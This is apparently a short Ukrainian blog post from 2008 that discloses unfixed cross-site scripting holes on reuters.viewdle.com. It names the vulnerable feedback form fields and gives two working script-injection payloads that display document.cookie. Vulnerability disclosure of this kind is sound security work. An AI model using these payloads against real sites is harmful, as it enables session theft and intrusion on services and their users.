Уразливості на reuters.viewdle.com
22:42 20.09.200804.04.2008
У вересні, 21.09.2007, а також додатково сьогодні, я знайшов Cross-Site Scripting уразливості на проекті http://reuters.viewdle.com (сервіс пошуку в відео). Про що найближчим часом сповіщу адміністрацію проекту.
Детальна інформація про уразливості з’явиться пізніше.
20.09.2008
XSS:
XSS:
POST запит на сторінці http://reuters.viewdle.com/feedback
"><script>alert(document.cookie)</script>
В полі: Your name.
</textarea><script>alert(document.cookie)</script>
В полі: Feedback.
Дані уразливості досі не виправлені.